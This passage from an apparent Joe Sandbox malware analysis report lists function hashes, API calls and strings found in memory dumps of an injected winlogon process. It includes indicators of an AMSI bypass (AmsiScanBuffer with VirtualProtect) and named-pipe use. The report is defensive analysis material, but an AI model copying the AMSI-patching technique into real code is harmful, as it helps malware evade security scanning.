                          • Instruction Fuzzy Hash: A1D1CA37644B8C81EA71DB0AE49079E77A0F788B89F504116EACD477A4CF3EC542CB86
                          APIs
                          Memory Dump Source
                          • Source File: 00000026.00000002.2556665994.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
                          • Associated: 00000026.00000002.2555892142.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2557614010.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2558252368.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2558993815.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2559657526.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_38_2_1ca7d210000_winlogon.jbxd
                          Similarity
                          • API ID: Free$CurrentThread
                          • String ID:
                          • API String ID: 564911740-0
                          • Opcode ID: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
                          • Instruction ID: 8074ab1debeccdb7de81f9b6b17c497a6e832b8f613fb371d3e6f8c834ae6948
                          • Opcode Fuzzy Hash: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
                          • Instruction Fuzzy Hash: 7D51C236A91B4995FA07DB28D851AD833A5FF4474CFC08819A52C063A5EF77C51AC3E3
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000026.00000002.2556665994.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
                          • Associated: 00000026.00000002.2555892142.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2557614010.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2558252368.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2558993815.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2559657526.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_38_2_1ca7d210000_winlogon.jbxd
                          Similarity
                          • API ID: Heap$Process$AllocFree
                          • String ID: $cnt-
                          • API String ID: 756756679-2536841369
                          • Opcode ID: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
                          • Instruction ID: 1920b0173048c2e31b506ed75283f2b7a4db50c395d0afa64895e5cbc0f95bca
                          • Opcode Fuzzy Hash: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
                          • Instruction Fuzzy Hash: 6131A233B45B9982F612CF169540BA97391BF44B88F888028DF4807755EF3BD4A283C6
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000026.00000002.2551471326.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                          • Associated: 00000026.00000002.2550625621.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2552462016.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2553296974.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2554151398.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2555098305.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_38_2_1ca7d1e0000_winlogon.jbxd
                          Similarity
                          • API ID: Heap$Process$AllocFree
                          • String ID: $cnt-
                          • API String ID: 756756679-2536841369
                          • Opcode ID: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
                          • Instruction ID: 53dd2015d23d3b19de732b4b8ca317527b9a6887f52f6010c9b4161ede9a8080
                          • Opcode Fuzzy Hash: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
                          • Instruction Fuzzy Hash: 2831A233B41B5982F716DF26D544AA973A0BF48F8AF8840208F4807755EF36C5A18383
                          APIs
                          Memory Dump Source
                          • Source File: 00000026.00000002.2556665994.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
                          • Associated: 00000026.00000002.2555892142.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2557614010.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2558252368.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2558993815.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2559657526.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_38_2_1ca7d210000_winlogon.jbxd
                          Similarity
                          • API ID: ErrorLast$Value$FreeHeap
                          • String ID:
                          • API String ID: 365477584-0
                          • Opcode ID: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
                          • Instruction ID: be797efc4d241fe522fb318c8b0c2a52a319cfeeeb0bbc57bc3f76715505c0c3
                          • Opcode Fuzzy Hash: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
                          • Instruction Fuzzy Hash: 25118237E8435882F616A7316911BFE7241BF847A8FD4C628A926567DACE3BD40353C3
                          APIs
                          Memory Dump Source
                          • Source File: 00000026.00000002.2556665994.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
                          • Associated: 00000026.00000002.2555892142.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2557614010.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2558252368.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2558993815.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2559657526.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_38_2_1ca7d210000_winlogon.jbxd
                          Similarity
                          • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                          • String ID:
                          • API String ID: 517849248-0
                          • Opcode ID: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
                          • Instruction ID: 8b86b7224197d8699fc3a6726de84bfb578e7bf873a1a615f1c4c61348878a40
                          • Opcode Fuzzy Hash: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
                          • Instruction Fuzzy Hash: 7D016132B44B4482F711DB12A854B9973A1FB88FD4F898034AE4D43754DE3EC54AC7D6
                          APIs
                          Memory Dump Source
                          • Source File: 00000026.00000002.2556665994.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
                          • Associated: 00000026.00000002.2555892142.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2557614010.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2558252368.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2558993815.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2559657526.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_38_2_1ca7d210000_winlogon.jbxd
                          Similarity
                          • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                          • String ID:
                          • API String ID: 449555515-0
                          • Opcode ID: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
                          • Instruction ID: 778107bd0b08783d02a6487691dad5ad8f670edfcd41cc8f228037a5f129dca4
                          • Opcode Fuzzy Hash: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
                          • Instruction Fuzzy Hash: 13016136B4174882FB269B25E848B9533A4BF48B59F844428D94D06358EF3FC14AC7DB
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000026.00000002.2556665994.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
                          • Associated: 00000026.00000002.2555892142.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2557614010.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2558252368.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2558993815.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2559657526.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_38_2_1ca7d210000_winlogon.jbxd
                          Similarity
                          • API ID: FinalHandleNamePathlstrlen
                          • String ID: \\?\
                          • API String ID: 2719912262-4282027825
                          • Opcode ID: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
                          • Instruction ID: a75b9edf9b8994863e05616ee0606fecf03f18b00d3583885107efc661ca5ccb
                          • Opcode Fuzzy Hash: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
                          • Instruction Fuzzy Hash: 0DF0A43375478892F7218B20F484B9A7360FB84B9CFC4C025DA4946554DE7EC74AC7D6
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000026.00000002.2556665994.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
                          • Associated: 00000026.00000002.2555892142.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2557614010.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2558252368.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2558993815.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2559657526.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_38_2_1ca7d210000_winlogon.jbxd
                          Similarity
                          • API ID: AddressFreeHandleLibraryModuleProc
                          • String ID: CorExitProcess$mscoree.dll
                          • API String ID: 4061214504-1276376045
                          • Opcode ID: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
                          • Instruction ID: 70c250347f594e71b17261cfaf8131f5a1330f05be77572a744952222a5b5b64
                          • Opcode Fuzzy Hash: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
                          • Instruction Fuzzy Hash: 6FF06273A4470941FA118B24E845BA93730FF49769FD54219AA6A451E4CF2EC44AC6CB
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000026.00000002.2556665994.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
                          • Associated: 00000026.00000002.2555892142.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2557614010.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2558252368.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2558993815.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2559657526.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_38_2_1ca7d210000_winlogon.jbxd
                          Similarity
                          • API ID: CombinePath
                          • String ID: \\.\pipe\
                          • API String ID: 3422762182-91387939
                          • Opcode ID: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
                          • Instruction ID: 127a490b207412094bdf773d7bc7f314ed27483ed9a8622cdd057b0091c70391
                          • Opcode Fuzzy Hash: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
                          • Instruction Fuzzy Hash: C8F0BE72B44B8881FA058B13B8045A97221BF48FC8FC5D430FE0A07B28CE39D54383C6
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000026.00000002.2556665994.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
                          • Associated: 00000026.00000002.2555892142.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2557614010.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2558252368.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2558993815.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2559657526.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_38_2_1ca7d210000_winlogon.jbxd
                          Similarity
                          • API ID: AddressLibraryLoadProcSleep
                          • String ID: AmsiScanBuffer$amsi.dll
                          • API String ID: 188063004-3248079830
                          • Opcode ID: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
                          • Instruction ID: 7246112f9244b4226b796b0cd794045831b2067abd02715776a67b51b8a182b6
                          • Opcode Fuzzy Hash: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
                          • Instruction Fuzzy Hash: 2ED0EC32E9170881F90B6B00DC54B9432217F94B18FC18018950A012649E3ED54A93DB
                          APIs
                          Memory Dump Source
                          • Source File: 00000026.00000002.2556665994.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
                          • Associated: 00000026.00000002.2555892142.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2557614010.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2558252368.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2558993815.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2559657526.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_38_2_1ca7d210000_winlogon.jbxd
                          Similarity
                          • API ID: CurrentThread
                          • String ID:
                          • API String ID: 2882836952-0
                          • Opcode ID: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
                          • Instruction ID: aa8ac499eb692d5db1208b44326d97ecb6e913e81b2b611b9ce91f482cf527ce
                          • Opcode Fuzzy Hash: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
                          • Instruction Fuzzy Hash: 5302FD33658B8486E761CB19F49079AB7B0F7C4798F504019EA8E47BA8DF7EC445CB82
                          APIs
                          Memory Dump Source
                          • Source File: 00000026.00000002.2556665994.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
                          • Associated: 00000026.00000002.2555892142.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2557614010.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2558252368.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2558993815.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2559657526.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_38_2_1ca7d210000_winlogon.jbxd
                          Similarity
                          • API ID: Value
                          • String ID:
                          • API String ID: 3702945584-0
                          • Opcode ID: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
                          • Instruction ID: f376f59fa2a11924f07aeae0f4e24fca5b39dbef64f999cd2058c410ead475d3
                          • Opcode Fuzzy Hash: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
                          • Instruction Fuzzy Hash: 04518F37B4470987F366CB15E441E9AB3A4FF88B58F908119AD5A43794DB3BD8068BC3
                          APIs
                          Memory Dump Source
                          • Source File: 00000026.00000002.2556665994.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
                          • Associated: 00000026.00000002.2555892142.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2557614010.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2558252368.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2558993815.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2559657526.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_38_2_1ca7d210000_winlogon.jbxd
                          Similarity
                          • API ID: Value
                          • String ID:
                          • API String ID: 3702945584-0
                          • Opcode ID: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
                          • Instruction ID: 9e5fd35e134bb6201940a3d8bb8db161ac21b1b241632d42dbc14525f9094f05
                          • Opcode Fuzzy Hash: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
                          • Instruction Fuzzy Hash: 7E518233B54705CBF726CF15A440A9A73A4FF84B88F808119AE4A43754DB3AD906C7C3
                          APIs
                          Memory Dump Source
                          • Source File: 00000026.00000002.2556665994.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
                          • Associated: 00000026.00000002.2555892142.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2557614010.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2558252368.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2558993815.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2559657526.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_38_2_1ca7d210000_winlogon.jbxd
                          Similarity
                          • API ID: CurrentThread
                          • String ID:
                          • API String ID: 2882836952-0
                          • Opcode ID: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
                          • Instruction ID: 613c8c001a099c7bb1652f2b5ad2a82541488477a47cebf72ef6da64e55ba237
                          • Opcode Fuzzy Hash: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
                          • Instruction Fuzzy Hash: 1B61DA33968B48C6F761CF19E440B5AB7A5F788748F904119EA8D43BA8DB7AC541CB82
                          APIs
                          Memory Dump Source
                          • Source File: 00000026.00000002.2556665994.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
                          • Associated: 00000026.00000002.2555892142.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2557614010.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2558252368.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2558993815.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2559657526.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_38_2_1ca7d210000_winlogon.jbxd
                          Similarity
                          • API ID: CurrentProcessProtectVirtual$HandleModule
                          • String ID:
                          • API String ID: 1092925422-0
                          • Opcode ID: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
                          • Instruction ID: d868ca04b8d8586f6f6a390e290e58150676275038ac38a85c7b80935c32969b
                          • Opcode Fuzzy Hash: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
                          • Instruction Fuzzy Hash: DE115137A0874483FB258B21E4046497771FF48B98F44402AEA4D03758EB7ED545C7CA
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000026.00000002.2556665994.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
                          • Associated: 00000026.00000002.2555892142.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2557614010.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2558252368.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2558993815.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2559657526.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_38_2_1ca7d210000_winlogon.jbxd
                          Similarity
                          • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                          • String ID: csm
                          • API String ID: 2395640692-1018135373
                          • Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                          • Instruction ID: a759c82f011c931f3a48cb36091e1ef5e587e1df0f78fc6b8324226c07ede887
                          • Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                          • Instruction Fuzzy Hash: 6051C133B417089AEB19CB25D084FA8B391FB54B9CF918128AA5547784DB7BC842C7C3
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000026.00000002.2556665994.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
                          • Associated: 00000026.00000002.2555892142.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2557614010.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2558252368.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2558993815.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2559657526.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_38_2_1ca7d210000_winlogon.jbxd
                          Similarity
                          • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                          • String ID: csm$csm
                          • API String ID: 3896166516-3733052814
                          • Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                          • Instruction ID: 10efc11f376cab87ef4acdaf2b77ccec9d4123c0fd27d91e5cae546ecccaa4a1
                          • Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                          • Instruction Fuzzy Hash: CA51B23398038887FBB68F119644B9877A1FB50B88F94811ADA5943B95C73BD553C7C3
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000026.00000002.2556665994.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
                          • Associated: 00000026.00000002.2555892142.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2557614010.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2558252368.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2558993815.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2559657526.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_38_2_1ca7d210000_winlogon.jbxd
                          Similarity
                          • API ID: CallEncodePointerTranslator
                          • String ID: MOC$RCC
                          • API String ID: 3544855599-2084237596
                          • Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                          • Instruction ID: 2a22e60a9b3f854304751452df9d98a64753f55934e27dd4094366773aca3260
                          • Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                          • Instruction Fuzzy Hash: 9C61B933908BC881EB728F15E5407DDB7A0FB85798F448219EB9817B55DB7EC192CB82
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000026.00000003.1759332183.000001CA7D1B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001CA7D1B0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_38_3_1ca7d1b0000_winlogon.jbxd
                          Similarity
                          • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                          • String ID: csm$csm
                          • API String ID: 3896166516-3733052814
                          • Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                          • Instruction ID: 02134d3feda2e96eb50003ad244677908c7789116ae644b7e14578b12ac1f724
                          • Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                          • Instruction Fuzzy Hash: 0E51D333A803888AFB768F51D244B987BA0FB54B9CF944119DA8D47BD5CB7AC451CB83
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000026.00000002.2556665994.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
                          • Associated: 00000026.00000002.2555892142.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2557614010.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2558252368.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2558993815.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2559657526.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_38_2_1ca7d210000_winlogon.jbxd
                          Similarity
                          • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                          • String ID: pid_
                          • API String ID: 517849248-4147670505
                          • Opcode ID: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
                          • Instruction ID: f5c0b545fa3a07ccbfa5bb088918576c4613ccf87af992a5142b58f16c0f08fa
                          • Opcode Fuzzy Hash: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
                          • Instruction Fuzzy Hash: F411A532B5878551FB129B25E8007DA76A5BF48748FC08429AA4983694EF3BC90BC7C3
                          APIs
                          Memory Dump Source
                          • Source File: 00000026.00000002.2556665994.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
                          • Associated: 00000026.00000002.2555892142.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2557614010.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2558252368.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2558993815.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2559657526.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_38_2_1ca7d210000_winlogon.jbxd
                          Similarity
                          • API ID: FileWrite$ConsoleErrorLastOutput
                          • String ID:
                          • API String ID: 2718003287-0
                          • Opcode ID: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
                          • Instruction ID: dd6aa663578507b66a76ee1b3aff8a7eb3297d8e7c986e84e6755fe8025d9d4f
                          • Opcode Fuzzy Hash: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
                          • Instruction Fuzzy Hash: B1D1CA33B14B8889F712CFA5D440ADC37B1FB54B98F814216EE49A7B99DA36D107C386
                          APIs
                          Memory Dump Source
                          • Source File: 00000026.00000002.2556665994.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
